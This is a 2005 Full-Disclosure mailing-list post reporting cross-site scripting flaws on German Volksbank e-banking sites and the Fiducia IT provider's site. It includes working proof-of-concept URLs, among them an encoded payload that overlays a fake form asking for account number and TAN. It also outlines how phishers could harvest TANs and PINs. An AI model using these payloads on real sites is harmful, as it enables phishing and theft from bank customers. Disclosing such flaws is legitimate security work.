[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] CSS (Cross Site Scripting) on Germanys second largest financial institute's ebanking portal (Volksbank Raiffeisenbank)

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] CSS (Cross Site Scripting) on Germanys second largest financial institute's ebanking portal (Volksbank Raiffeisenbank)
From: Constantin Hofstetter <constantin.hofstetter@xxxxxxxxx>
Date: Thu, 22 Dec 2005 21:02:28 +0100

I emaild the Administrators 2 months ago - the only response I got was
something like:
"We will look into it, but we may or may not change anything on the page -
who knows; we wont tell you!".
I called them and the guy on the phone laughed at me.

Here are the links / examples:

*Original:*
https://www.vr-ebanking.de/index.php?RZBK=0280 [vr-ebanking.de]
*MY Version (CSS):*
https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&Ini
t 
Href=http://www.consti.de/secure<https://www.vr-ebanking.de/help;jsessionid=XA?Action=SelectMenu&SMID=EigenesOrderbuch&MenuName=&InitHref=http://www.consti.de/secure>[
vr-ebanking.de]
*/Fälschung --> Imitation /*
My local Banks Website:
http://voba-lindenberg.de/content_suche.php?search=<b>Mysql_Injection?</b>'<http://voba-lindenberg.de/content_suche.php?search=%3Cdiv%20style=z-index:2000;position:absolute;margin-top:-52>

The Institute that should secure the financial institute's websites:
http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/!SearchView&query=AA%22%3E<b>Whatever_You_Like_</b>&SearchMax=10
<http://www.fiducia.de/__C1256CF50056F303.nsf/SearchView/%21SearchView&query=AA%22%3E%3Cdiv%20style=z-index:2000;position:absolute;width:90%25;height:90%25;margin:-150px;padding:60px;background:white;%3E%3Ch1%3EKonto%20Erneuern%3C/h1%3E%3Cp%3E%3Ctable%3E%3Ctr%3E%3Ctd%3E%3Cb%3EKontonummer:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cb%3ETAN:%3C/b%3E%3C/td%3E%3Ctd%3E%3Cinput%3E%3C/td%3E%3C/tr%3E%3Ctr%3E%3Ctd%3E%3Cbr%3E%3C/td%3E%3Ctd%3E%3Cinput%20type=submit%20value=Aktivieren%3E%3C/td%3E%3C/tr%3E%3C/table%3E%3C/div%3E%3Cinput%20value=%22&SearchMax=10>

and so on..

The vr-ebanking site is used by millions of people each day for their daily
financial stuff (ebanking) - someone (phisers) could easily use the CSS
(Cross Site Scripting) to create
real looking websites "within" the domain; More importantly they could
create a website that does all the true login stuff (in the background) but
sniffs out the TANs and PINs (think snoopy.in, think curl, think a mysql
database full of working tans!).
This is not looking to good for my bank, but they dont listen -

--
Constantin Hofstetter
http://www.consti.de
Constantin.Hofstetter@xxxxxxxxx
mailmespam@xxxxxxxxx

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] new attack technique? usingJavaScript+XML+OWSPost Data
Next by Date: [Full-disclosure] toshiba bluetooth contact?
Previous by thread: [Full-disclosure] Privilege escalation in McAfee VirusScan Enterprise 8.0i (patch 11) and CMA 3.5 (patch 5)
Next by thread: [Full-disclosure] toshiba bluetooth contact?
Index(es):
- Date
- Thread